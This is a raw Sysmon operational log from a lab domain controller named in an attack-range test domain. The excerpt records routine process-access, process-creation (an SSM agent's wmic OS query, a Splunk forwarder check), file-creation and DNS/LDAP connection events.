12:01:06.212{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.188{266CAFBE-6481-6064-6100-00000000AE01}3848NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.080{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54715- 354300x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56179- 354300x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.050{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49696-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.050{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49696-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64876- 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-6482-6064-6200-00000000AE01}40204008C:\Windows\system32\cmd.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.042{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 